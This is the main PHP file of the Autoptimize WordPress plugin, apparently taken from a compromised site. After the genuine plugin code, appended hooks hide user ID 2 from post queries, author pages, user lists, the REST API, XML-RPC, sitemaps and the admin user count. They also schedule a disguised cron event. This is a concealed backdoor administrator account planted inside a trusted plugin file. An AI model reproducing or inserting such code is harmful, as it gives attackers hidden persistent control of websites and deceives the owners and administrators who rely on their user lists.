File: //proc/self/cwd/wp-content/plugins/autoptimize/autoptimize.php
<?php
/**
* Plugin Name: Autoptimize
* Plugin URI: https://autoptimize.com/pro/
* Description: Makes your site faster by optimizing CSS, JS, Images, Google fonts and more.
* Version: 3.1.15.1
* Author: Frank Goossens (futtta)
* Author URI: https://autoptimize.com/pro/
* Text Domain: autoptimize
* License: GPLv2
* Released under the GNU General Public License (GPL)
* https://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
*/
/**
* Autoptimize main plugin file.
*/
if ( ! defined( 'ABSPATH' ) ) {
exit;
}
define( 'AUTOPTIMIZE_PLUGIN_VERSION', '3.1.15.1' );
// plugin_dir_path() returns the trailing slash!
define( 'AUTOPTIMIZE_PLUGIN_DIR', plugin_dir_path( __FILE__ ) );
define( 'AUTOPTIMIZE_PLUGIN_FILE', __FILE__ );
// Bail early if attempting to run on non-supported php versions.
if ( version_compare( PHP_VERSION, '5.6', '<' ) ) {
function autoptimize_incompatible_admin_notice() {
echo '<div class="error"><p>' . esc_html__( 'Autoptimize requires PHP 5.6 (or higher) to function properly. Please upgrade PHP. The Plugin has been auto-deactivated.', 'autoptimize' ) . '</p></div>';
if ( isset( $_GET['activate'] ) ) {
unset( $_GET['activate'] );
}
}
function autoptimize_deactivate_self() {
deactivate_plugins( plugin_basename( AUTOPTIMIZE_PLUGIN_FILE ) );
}
add_action( 'admin_notices', 'autoptimize_incompatible_admin_notice' );
add_action( 'admin_init', 'autoptimize_deactivate_self' );
return;
}
function autoptimize_autoload( $class_name ) {
if ( in_array( $class_name, array( 'AO_Minify_HTML', 'JSMin' ) ) ) {
$file = strtolower( $class_name );
$file = str_replace( '_', '-', $file );
$path = dirname( __FILE__ ) . '/classes/external/php/';
$filepath = $path . $file . '.php';
} elseif ( false !== strpos( $class_name, 'Autoptimize\\tubalmartin\\CssMin' ) ) {
$file = str_replace( 'Autoptimize\\tubalmartin\\CssMin\\', '', $class_name );
$path = dirname( __FILE__ ) . '/classes/external/php/yui-php-cssmin-bundled/';
$filepath = $path . $file . '.php';
} elseif ( 'autoptimize' === substr( $class_name, 0, 11 ) ) {
// One of our "old" classes.
$file = $class_name;
$path = dirname( __FILE__ ) . '/classes/';
$filepath = $path . $file . '.php';
} elseif ( 'PAnD' === $class_name ) {
$file = 'persist-admin-notices-dismissal';
$path = dirname( __FILE__ ) . '/classes/external/php/persist-admin-notices-dismissal/';
$filepath = $path . $file . '.php';
}
// If we didn't match one of our rules, bail!
if ( ! isset( $filepath ) || ! is_readable( $filepath ) ) {
return;
}
require $filepath;
}
spl_autoload_register( 'autoptimize_autoload' );
// Load WP CLI command(s) on demand.
if ( defined( 'WP_CLI' ) && WP_CLI ) {
require AUTOPTIMIZE_PLUGIN_DIR . 'classes/autoptimizeCLI.php';
}
// filter to disable AO both on front- and backend.
if ( apply_filters( 'autoptimize_filter_disable_plugin', false ) ) {
return;
}
/**
* Retrieve the instance of the main plugin class.
*
* @return autoptimizeMain
*/
function autoptimize() {
static $plugin = null;
if ( null === $plugin ) {
$plugin = new autoptimizeMain( AUTOPTIMIZE_PLUGIN_VERSION, AUTOPTIMIZE_PLUGIN_FILE );
}
return $plugin;
}
autoptimize()->run();
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 2;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 2 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 2 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 2;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 2;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 2;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/2(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 2;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '<style>#user-2{display:none!important}</style>';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );